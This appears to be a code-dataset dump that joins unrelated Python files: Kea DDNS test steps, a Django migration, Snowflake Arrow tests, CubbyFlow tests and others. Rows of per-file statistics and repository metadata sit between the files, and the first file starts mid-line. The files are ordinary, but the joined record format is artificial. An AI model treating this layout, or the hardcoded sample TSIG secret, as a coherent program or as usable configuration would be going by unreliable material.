'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
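# For orientation, the srv_control calls above assemble a Kea DHCP-DDNS (D2)
# configuration roughly shaped like the dict below. This is an illustrative
# sketch of the JSON layout, not the exact config forge generates.
d2_config_sketch = {
    "DhcpDdns": {
        "ip-address": "127.0.0.1",
        "port": 53001,
        "tsig-keys": [{
            "name": "forge.sha1.key",
            "algorithm": "HMAC-SHA1",
            "secret": "PN4xKZ/jDobCMlo4rpr70w==",
        }],
        "forward-ddns": {"ddns-domains": [{
            "name": "six.example.com.",
            "key-name": "forge.sha1.key",
        }]},
        "reverse-ddns": {"ddns-domains": [{
            "name": "1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.",
            "key-name": "forge.sha1.key",
        }]},
    }
}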
| 39.813333
| 108
| 0.691226
| 2,490
| 14,930
| 3.815261
| 0.05261
| 0.049684
| 0.060316
| 0.069474
| 0.984421
| 0.982421
| 0.982421
| 0.978526
| 0.978526
| 0.978526
| 0
| 0.059073
| 0.146216
| 14,930
| 374
| 109
| 39.919786
| 0.686201
| 0.004086
| 0
| 0.957377
| 0
| 0.04918
| 0.239185
| 0.108861
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009836
| true
| 0.081967
| 0.013115
| 0
| 0.022951
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 9
| 40f2bdf2ff737927ae5c8ba7967ce36f0824a938
| 258
| py
| Python
| metamaker/commands/sagemaker/__init__.py
| altescy/metamaker
| 6161b1286ef36687321213cfb1233767fb240bec
| ["MIT"] | 5
| 2021-11-07T16:10:29.000Z
| 2022-01-09T16:55:30.000Z
| metamaker/commands/sagemaker/__init__.py
| altescy/metamaker
| 6161b1286ef36687321213cfb1233767fb240bec
| ["MIT"] | 2
| 2021-11-09T05:37:30.000Z
| 2021-11-09T05:37:51.000Z
| metamaker/commands/sagemaker/__init__.py
| altescy/metamaker
| 6161b1286ef36687321213cfb1233767fb240bec
| ["MIT"] | null | null | null |
from metamaker.commands.sagemaker.deploy import DeployWithSagemakerCommand # noqa: F401
from metamaker.commands.sagemaker.sagemaker import SageMakerCommand # noqa: F401
from metamaker.commands.sagemaker.train import TrainWithSagemakerCommand # noqa: F401
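# This __init__ simply re-exports the three command classes, so callers can
# pull them from the package root. A hypothetical consumer-side usage sketch
# (the CLI-registration machinery is not shown in this file):
from metamaker.commands.sagemaker import (
    DeployWithSagemakerCommand,
    SageMakerCommand,
    TrainWithSagemakerCommand,
)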
| 64.5
| 88
| 0.848837
| 27
| 258
| 8.111111
| 0.444444
| 0.178082
| 0.287671
| 0.410959
| 0.347032
| 0.347032
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.093023
| 258
| 3
| 89
| 86
| 0.897436
| 0.124031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| dc0e6d8bce5be4b6a90e027e0478d094f703d8c9
| 304
| py
| Python
| StringModification.py
| AmreshTripathy/Python
| e86420fef7f52da393be5b50ac2f13bddfeb3306
| ["Apache-2.0"] | 4
| 2021-05-27T05:06:09.000Z
| 2021-06-12T17:12:47.000Z
| StringModification.py
| AmreshTripathy/Python
| e86420fef7f52da393be5b50ac2f13bddfeb3306
| ["Apache-2.0"] | null | null | null
| StringModification.py
| AmreshTripathy/Python
| e86420fef7f52da393be5b50ac2f13bddfeb3306
| ["Apache-2.0"] | null | null | null |
# For each of the n test cases, print the even-indexed characters of the
# string, a single space, then the odd-indexed characters.
n = int(input())
for i in range(n):
    string = input()
    for j in range(len(string)):
        if j % 2 == 0:
            print(string[j], end='')
    print(" ", end='')
    for j in range(len(string)):
        if j % 2 != 0:
            print(string[j], end='')
    print("")
| 23.384615
| 37
| 0.421053
| 44
| 304
| 2.909091
| 0.340909
| 0.164063
| 0.1875
| 0.171875
| 0.71875
| 0.71875
| 0.71875
| 0.71875
| 0.71875
| 0.71875
| 0
| 0.036458
| 0.368421
| 304
| 12
| 38
| 25.333333
| 0.630208
| 0
| 0
| 0.363636
| 0
| 0
| 0.003425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.363636
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 9065069eba8e7a5b40e3c8e8aa797f080d6fb026
| 1,194
| py
| Python
| tests/test_1881.py
| sungho-joo/leetcode2github
| ce7730ef40f6051df23681dd3c0e1e657abba620
| ["MIT"] | null | null | null
| tests/test_1881.py
| sungho-joo/leetcode2github
| ce7730ef40f6051df23681dd3c0e1e657abba620
| ["MIT"] | null | null | null
| tests/test_1881.py
| sungho-joo/leetcode2github
| ce7730ef40f6051df23681dd3c0e1e657abba620
| ["MIT"] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1881. Maximum Value after Insertion
"""
@pytest.fixture(scope="session")
def init_variables_1881():
from src.leetcode_1881_maximum_value_after_insertion import Solution
solution = Solution()
def _init_variables_1881():
return solution
yield _init_variables_1881
class TestClass1881:
def test_solution_0(self, init_variables_1881):
assert init_variables_1881().maxValue("99", 9) == "999"
def test_solution_1(self, init_variables_1881):
assert init_variables_1881().maxValue("-13", 2) == "-123"
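# One plausible implementation of the Solution class these tests exercise
# (a sketch consistent with the asserted cases above, not necessarily the
# repository's actual code). For a positive number, insert x before the first
# digit smaller than it; for a negative number, before the first digit larger.
class Solution:
    def maxValue(self, n: str, x: int) -> str:
        xs = str(x)
        if n[0] != '-':
            for i, ch in enumerate(n):
                if ch < xs:
                    return n[:i] + xs + n[i:]
            return n + xs
        for i, ch in enumerate(n[1:], start=1):
            if ch > xs:
                return n[:i] + xs + n[i:]
        return n + xs

assert Solution().maxValue("99", 9) == "999"
assert Solution().maxValue("-13", 2) == "-123"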
| 20.947368
| 72
| 0.716918
| 152
| 1,194
| 5.302632
| 0.243421
| 0.225806
| 0.295285
| 0.104218
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.109756
| 0.175879
| 1,194
| 56
| 73
| 21.321429
| 0.70935
| 0.033501
| 0
| 1
| 0
| 0
| 0.035985
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.307692
| false
| 0
| 0.153846
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 11
| 907720645e479a1c53f5adc502da42efab04a4c8
| 5,614
| py
| Python
| test/test_unit_arrow_chunk_iterator.py
| mariusvniekerk/snowflake-connector-python
| 4c6b728f9ca7ac9c8a318741924a963a5574e216
| ["Apache-2.0"] | null | null | null
| test/test_unit_arrow_chunk_iterator.py
| mariusvniekerk/snowflake-connector-python
| 4c6b728f9ca7ac9c8a318741924a963a5574e216
| ["Apache-2.0"] | null | null | null
| test/test_unit_arrow_chunk_iterator.py
| mariusvniekerk/snowflake-connector-python
| 4c6b728f9ca7ac9c8a318741924a963a5574e216
| ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2019 Snowflake Computing Inc. All right reserved.
#
from io import BytesIO
import random
import pytest
try:
from pyarrow import RecordBatchStreamReader
from pyarrow import RecordBatchStreamWriter
from pyarrow import RecordBatch
from snowflake.connector.arrow_iterator import PyArrowChunkIterator
import pyarrow
except ImportError:
pass
@pytest.mark.skip(
reason="Cython is not enabled in build env")
def test_iterate_over_string_chunk():
stream = BytesIO()
field_foo = pyarrow.field("column_foo", pyarrow.string(), True)
field_bar = pyarrow.field("column_bar", pyarrow.string(), True)
schema = pyarrow.schema([field_foo, field_bar])
column_meta = [
("column_foo", "TEXT", None, 0, 0, 0, 0),
("column_bar", "TEXT", None, 0, 0, 0, 0)
]
column_size = 2
batch_row_count = 10
batch_count = 10
expected_data = []
writer = RecordBatchStreamWriter(stream, schema)
for i in range(batch_count):
column_arrays = []
py_arrays = []
for j in range(column_size):
column_data = []
for k in range(batch_row_count):
data = None if bool(random.getrandbits(1)) else random.randint(-100, 100)
column_data.append(str(data))
column_arrays.append(column_data)
py_arrays.append(pyarrow.array(column_data))
expected_data.append(column_arrays)
rb = RecordBatch.from_arrays(py_arrays, ["column_foo", "column_bar"])
writer.write_batch(rb)
writer.close()
    # seek stream to beginning so that we can read from stream
stream.seek(0)
reader = RecordBatchStreamReader(stream)
it = PyArrowChunkIterator()
for rb in reader:
it.add_record_batch(rb)
count = 0
while True:
try:
val = next(it)
assert val[0] == expected_data[int(count / 10)][0][count % 10]
assert val[1] == expected_data[int(count / 10)][1][count % 10]
count += 1
except StopIteration:
assert count == 100
break
@pytest.mark.skip(
reason="Cython is not enabled in build env")
def test_iterate_over_int64_chunk():
stream = BytesIO()
field_foo = pyarrow.field("column_foo", pyarrow.int64(), True)
field_bar = pyarrow.field("column_bar", pyarrow.int64(), True)
schema = pyarrow.schema([field_foo, field_bar])
column_meta = [
("column_foo", "FIXED", None, 0, 0, 0, 0),
("column_bar", "FIXED", None, 0, 0, 0, 0)
]
column_size = 2
batch_row_count = 10
batch_count = 10
expected_data = []
writer = RecordBatchStreamWriter(stream, schema)
for i in range(batch_count):
column_arrays = []
py_arrays = []
for j in range(column_size):
column_data = []
for k in range(batch_row_count):
data = None if bool(random.getrandbits(1)) else random.randint(-100, 100)
column_data.append(data)
column_arrays.append(column_data)
py_arrays.append(pyarrow.array(column_data))
expected_data.append(column_arrays)
rb = RecordBatch.from_arrays(py_arrays, ["column_foo", "column_bar"])
writer.write_batch(rb)
writer.close()
    # seek stream to beginning so that we can read from stream
stream.seek(0)
reader = RecordBatchStreamReader(stream)
it = PyArrowChunkIterator()
for rb in reader:
it.add_record_batch(rb)
count = 0
while True:
try:
val = next(it)
assert val[0] == expected_data[int(count / 10)][0][count % 10]
assert val[1] == expected_data[int(count / 10)][1][count % 10]
count += 1
except StopIteration:
assert count == 100
break
@pytest.mark.skip(
reason="Cython is not enabled in build env")
def test_iterate_over_float_chunk():
stream = BytesIO()
field_foo = pyarrow.field("column_foo", pyarrow.float64(), True)
field_bar = pyarrow.field("column_bar", pyarrow.float64(), True)
schema = pyarrow.schema([field_foo, field_bar])
column_meta = [
("column_foo", "FLOAT", None, 0, 0, 0, 0),
("column_bar", "FLOAT", None, 0, 0, 0, 0)
]
column_size = 2
batch_row_count = 10
batch_count = 10
expected_data = []
writer = RecordBatchStreamWriter(stream, schema)
for i in range(batch_count):
column_arrays = []
py_arrays = []
for j in range(column_size):
column_data = []
for k in range(batch_row_count):
data = None if bool(random.getrandbits(1)) else random.uniform(-100.0, 100.0)
column_data.append(data)
column_arrays.append(column_data)
py_arrays.append(pyarrow.array(column_data))
expected_data.append(column_arrays)
rb = RecordBatch.from_arrays(py_arrays, ["column_foo", "column_bar"])
writer.write_batch(rb)
writer.close()
    # seek stream to beginning so that we can read from stream
stream.seek(0)
reader = RecordBatchStreamReader(stream)
it = PyArrowChunkIterator()
for rb in reader:
it.add_record_batch(rb)
count = 0
while True:
try:
val = next(it)
assert val[0] == expected_data[int(count / 10)][0][count % 10]
assert val[1] == expected_data[int(count / 10)][1][count % 10]
count += 1
except StopIteration:
assert count == 100
break
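# The three tests above are identical except for the Arrow type, the Snowflake
# column type, and the value generator. A parametrized variant could collapse
# them; this is a sketch under the same Cython-disabled skip, with the shared
# write/read/assert body elided rather than repeated.
CASES = [
    ("string", "TEXT", lambda: str(random.randint(-100, 100))),
    ("int64", "FIXED", lambda: random.randint(-100, 100)),
    ("float64", "FLOAT", lambda: random.uniform(-100.0, 100.0)),
]

@pytest.mark.skip(reason="Cython is not enabled in build env")
@pytest.mark.parametrize("type_name,column_type,gen", CASES)
def test_iterate_over_chunk(type_name, column_type, gen):
    arrow_type = getattr(pyarrow, type_name)()
    # ...build the two-column schema from arrow_type and run the shared
    # write/read/assert body used by the three tests above...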
| 31.188889
| 93
| 0.615248
| 707
| 5,614
| 4.710042
| 0.161245
| 0.010811
| 0.010811
| 0.012613
| 0.88018
| 0.88018
| 0.88018
| 0.856456
| 0.82042
| 0.82042
| 0
| 0.033153
| 0.27467
| 5,614
| 179
| 94
| 31.363128
| 0.784627
| 0.049697
| 0
| 0.794521
| 0
| 0
| 0.058194
| 0
| 0
| 0
| 0
| 0
| 0.061644
| 1
| 0.020548
| false
| 0.006849
| 0.061644
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 9092112316f4e097a11c9c44c18b31465adb4ef1
| 6,452
| py
| Python
| company/migrations/0055_auto_20170809_1006.py
| uktrade/directory-api
| 45a9024a7ecc2842895201cbb51420ba9e57a168
| ["MIT"] | 2
| 2017-06-02T09:09:08.000Z
| 2021-01-18T10:26:53.000Z
| company/migrations/0055_auto_20170809_1006.py
| uktrade/directory-api
| 45a9024a7ecc2842895201cbb51420ba9e57a168
| ["MIT"] | 629
| 2016-10-10T09:35:52.000Z
| 2022-03-25T15:04:04.000Z
| company/migrations/0055_auto_20170809_1006.py
| uktrade/directory-api
| 45a9024a7ecc2842895201cbb51420ba9e57a168
| ["MIT"] | 5
| 2017-06-22T10:02:22.000Z
| 2022-03-14T17:55:21.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-08-09 10:06
from __future__ import unicode_literals
import directory_validators.string
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('company', '0054_auto_20170731_1054'),
]
operations = [
migrations.AlterField(
model_name='company',
name='address_line_1',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='address_line_2',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='country',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='description',
field=models.TextField(blank=True, default='', validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='email_full_name',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='export_destinations_other',
field=models.CharField(blank=True, default='', help_text='Of the countries the project have not prioritised,which does the company want to export to (free text).', max_length=1000, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='keywords',
field=models.TextField(blank=True, default='', validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='locality',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='name',
field=models.CharField(max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='number',
field=models.CharField(max_length=8, unique=True, validators=[django.core.validators.RegexValidator(code='invalid_company_number', message='Company number must be 8 characters', regex='^[A-Za-z0-9]{8}$'), directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='po_box',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='postal_code',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='postal_full_name',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='company',
name='summary',
field=models.CharField(blank=True, default='', max_length=250, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='description',
field=models.CharField(max_length=1000, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='image_one_caption',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='image_three_caption',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='image_two_caption',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='keywords',
field=models.TextField(validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='short_summary',
field=models.CharField(blank=True, default='', max_length=200, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial',
field=models.CharField(blank=True, default='', max_length=1000, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial_company',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial_job_title',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='testimonial_name',
field=models.CharField(blank=True, default='', max_length=255, validators=[directory_validators.string.no_html]),
),
migrations.AlterField(
model_name='companycasestudy',
name='title',
field=models.CharField(max_length=100, validators=[directory_validators.string.no_html]),
),
]
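# A quick standalone check of the company-number rule this migration encodes
# (the regex is taken verbatim from the RegexValidator above): exactly eight
# alphanumeric characters.
import re

company_number = re.compile(r'^[A-Za-z0-9]{8}$')
assert company_number.match('AB123456')
assert not company_number.match('1234567')    # too short
assert not company_number.match('12345678!')  # disallowed character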
| 45.118881
| 255
| 0.632982
| 637
| 6,452
| 6.204082
| 0.167975
| 0.125
| 0.164474
| 0.183451
| 0.84919
| 0.815283
| 0.7958
| 0.7958
| 0.771002
| 0.756073
| 0
| 0.021757
| 0.244885
| 6,452
| 142
| 256
| 45.43662
| 0.789409
| 0.010539
| 0
| 0.711111
| 1
| 0.007407
| 0.123648
| 0.014261
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02963
| 0
| 0.051852
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 90dff925169df4343abe14a5ad634cd849959576
| 3,971
| py
| Python
| Tests/PythonTests/ParticleSystemDataTests.py
| utilForever/CubbyFlow-v1
| d85c136d8eaa91ecce456c3356c7e578dda5d5bd
| ["MIT"] | 3
| 2020-04-15T13:41:16.000Z
| 2020-12-29T11:23:59.000Z
| Tests/PythonTests/ParticleSystemDataTests.py
| utilForever/CubbyFlow-v1
| d85c136d8eaa91ecce456c3356c7e578dda5d5bd
| ["MIT"] | null | null | null
| Tests/PythonTests/ParticleSystemDataTests.py
| utilForever/CubbyFlow-v1
| d85c136d8eaa91ecce456c3356c7e578dda5d5bd
| ["MIT"] | null | null | null |
import numpy as np
import pyCubbyFlow
import unittest
class ParticleSystemData2Tests(unittest.TestCase):
def testInit(self):
ps = pyCubbyFlow.ParticleSystemData2()
self.assertEqual(ps.numberOfParticles, 0)
ps2 = pyCubbyFlow.ParticleSystemData2(100)
self.assertEqual(ps2.numberOfParticles, 100)
def testResize(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
self.assertEqual(ps.numberOfParticles, 12)
def testAddScalarData(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
a0 = ps.AddScalarData(2.0)
a1 = ps.AddScalarData(9.0)
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 0)
self.assertEqual(a1, 1)
as0 = np.array(ps.ScalarDataAt(a0))
for val in as0:
self.assertEqual(val, 2.0)
as1 = np.array(ps.ScalarDataAt(a1))
for val in as1:
self.assertEqual(val, 9.0)
def testAddVectorData(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
a0 = ps.AddVectorData((2.0, 4.0))
a1 = ps.AddVectorData((9.0, -2.0))
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 3)
self.assertEqual(a1, 4)
as0 = np.array(ps.VectorDataAt(a0))
for val in as0:
self.assertEqual(val.tolist(), [2.0, 4.0])
as1 = np.array(ps.VectorDataAt(a1))
for val in as1:
self.assertEqual(val.tolist(), [9.0, -2.0])
def testAddParticles(self):
ps = pyCubbyFlow.ParticleSystemData2()
ps.Resize(12)
ps.AddParticles([(1.0, 2.0), (4.0, 5.0)],
[(7.0, 8.0), (8.0, 7.0)],
[(5.0, 4.0), (2.0, 1.0)])
self.assertEqual(ps.numberOfParticles, 14)
p = np.array(ps.positions)
v = np.array(ps.velocities)
f = np.array(ps.forces)
self.assertEqual([1.0, 2.0], p[12].tolist())
self.assertEqual([4.0, 5.0], p[13].tolist())
self.assertEqual([7.0, 8.0], v[12].tolist())
self.assertEqual([8.0, 7.0], v[13].tolist())
self.assertEqual([5.0, 4.0], f[12].tolist())
self.assertEqual([2.0, 1.0], f[13].tolist())
class ParticleSystemData3Tests(unittest.TestCase):
def testInit(self):
ps = pyCubbyFlow.ParticleSystemData3()
self.assertEqual(ps.numberOfParticles, 0)
ps2 = pyCubbyFlow.ParticleSystemData3(100)
self.assertEqual(ps2.numberOfParticles, 100)
def testResize(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
self.assertEqual(ps.numberOfParticles, 12)
def testAddScalarData(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
a0 = ps.AddScalarData(2.0)
a1 = ps.AddScalarData(9.0)
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 0)
self.assertEqual(a1, 1)
as0 = np.array(ps.ScalarDataAt(a0))
for val in as0:
self.assertEqual(val, 2.0)
as1 = np.array(ps.ScalarDataAt(a1))
for val in as1:
self.assertEqual(val, 9.0)
def testAddVectorData(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
a0 = ps.AddVectorData((2.0, 4.0, -1.0))
a1 = ps.AddVectorData((9.0, -2.0, 5.0))
self.assertEqual(ps.numberOfParticles, 12)
self.assertEqual(a0, 3)
self.assertEqual(a1, 4)
as0 = np.array(ps.VectorDataAt(a0))
for val in as0:
self.assertEqual(val.tolist(), [2.0, 4.0, -1.0])
as1 = np.array(ps.VectorDataAt(a1))
for val in as1:
self.assertEqual(val.tolist(), [9.0, -2.0, 5.0])
def testAddParticles(self):
ps = pyCubbyFlow.ParticleSystemData3()
ps.Resize(12)
ps.AddParticles([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)],
[(7.0, 8.0, 9.0), (8.0, 7.0, 6.0)],
[(5.0, 4.0, 3.0), (2.0, 1.0, 3.0)])
self.assertEqual(ps.numberOfParticles, 14)
p = np.array(ps.positions)
v = np.array(ps.velocities)
f = np.array(ps.forces)
self.assertEqual([1.0, 2.0, 3.0], p[12].tolist())
self.assertEqual([4.0, 5.0, 6.0], p[13].tolist())
self.assertEqual([7.0, 8.0, 9.0], v[12].tolist())
self.assertEqual([8.0, 7.0, 6.0], v[13].tolist())
self.assertEqual([5.0, 4.0, 3.0], f[12].tolist())
self.assertEqual([2.0, 1.0, 3.0], f[13].tolist())
def main():
pyCubbyFlow.Logging.mute()
unittest.main()
if __name__ == '__main__':
main()
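# Note the indices asserted above: custom scalar channels land at 0 and 1,
# while custom vector channels land at 3 and 4. That is consistent with
# ParticleSystemData pre-reserving three vector channels (positions,
# velocities, forces); this is an inference from the tests, not a documented
# API fact.
RESERVED_VECTOR_CHANNELS = 3  # positions, velocities, forces (assumed)
first_custom_vector_index = RESERVED_VECTOR_CHANNELS  # == 3, matching a0 above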
| 26.831081
| 53
| 0.669101
| 613
| 3,971
| 4.32137
| 0.102773
| 0.226501
| 0.047565
| 0.12835
| 0.904492
| 0.89732
| 0.866742
| 0.755002
| 0.739147
| 0.689317
| 0
| 0.09209
| 0.146814
| 3,971
| 148
| 54
| 26.831081
| 0.689787
| 0
| 0
| 0.672414
| 0
| 0
| 0.002014
| 0
| 0
| 0
| 0
| 0
| 0.344828
| 1
| 0.094828
| false
| 0
| 0.025862
| 0
| 0.137931
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 295c11c9c932dc89ac21c44ea60e8c3b53b416bc
| 88,087
| py
| Python
| scripts/ecmp/sanity.py
| vkolli/5.0_contrail-test
| 1793f169a94100400a1b2fafbad21daf5aa4d48a
| ["Apache-2.0"] | null | null | null
| scripts/ecmp/sanity.py
| vkolli/5.0_contrail-test
| 1793f169a94100400a1b2fafbad21daf5aa4d48a
| ["Apache-2.0"] | 1
| 2021-06-01T22:18:29.000Z
| 2021-06-01T22:18:29.000Z
| scripts/ecmp/sanity.py
| lmadhusudhanan/contrail-test
| bd39ff19da06a20bd79af8c25e3cde07375577cf
| ["Apache-2.0"] | null | null | null |
# Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# To run tests, you can do 'python -m testtools.run tests'. To run specific tests,
# You can do 'python -m testtools.run -l tests'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will
# try to pick params.ini in PWD
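# A concrete invocation might look like this (paths and module name are
# illustrative, not prescribed by the comments above):
#   export PYTHONPATH=$PYTHONPATH:/root/test/fixtures/:/root/test/scripts/
#   export PARAMS_FILE=/root/test/params.ini
#   python -m testtools.run ecmp.sanity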
import sys
import os
from common.openstack_libs import nova_client as mynovaclient
from common.openstack_libs import nova_exception as novaException
import unittest
import fixtures
import testtools
import traceback
import traffic_tests
from common.contrail_test_init import ContrailTestInit
from vn_test import *
from floating_ip import *
from quantum_test import *
from vnc_api_test import *
from nova_test import *
from vm_test import *
from common.connections import ContrailConnections
from contrail_fixtures import *
from tcutils.wrappers import preposttest_wrapper
sys.path.append(os.path.realpath('tcutils/pkgs/Traffic'))
from traffic.core.stream import Stream
from traffic.core.profile import create, ContinuousProfile
from traffic.core.helpers import Host
from traffic.core.helpers import Sender, Receiver
from testresources import ResourcedTestCase
from ecmp_test_resource import ECMPSolnSetupResource
class TestECMP(testtools.TestCase, ResourcedTestCase, fixtures.TestWithFixtures):
resources = [('base_setup', ECMPSolnSetupResource)]
def __init__(self, *args, **kwargs):
testtools.TestCase.__init__(self, *args, **kwargs)
self.res = ECMPSolnSetupResource.getResource()
self.inputs = self.res.inputs
self.connections = self.res.connections
self.quantum_h = self.connections.quantum_h
self.nova_h = self.connections.nova_h
self.vnc_lib = self.connections.vnc_lib
self.logger = self.res.logger
self.agent_inspect = self.connections.agent_inspect
self.cn_inspect = self.connections.cn_inspect
self.api_s_inspect = self.connections.api_server_inspect
self.analytics_obj = self.connections.analytics_obj
self.agent_vn_obj = {}
def __del__(self):
print "Deleting test_with_setup now"
ECMPSolnSetupResource.finishedWith(self.res)
def setUp(self):
super(TestECMP, self).setUp()
if 'TEST_CONFIG_FILE' in os.environ:
self.input_file = os.environ.get('TEST_CONFIG_FILE')
else:
self.input_file = 'params.ini'
def tearDown(self):
print "Tearing down test"
super(TestECMP, self).tearDown()
ECMPSolnSetupResource.finishedWith(self.res)
def runTest(self):
pass
# end runTest
@preposttest_wrapper
def test_ecmp_to_non_ecmp_bw_three_vms_same_fip(self):
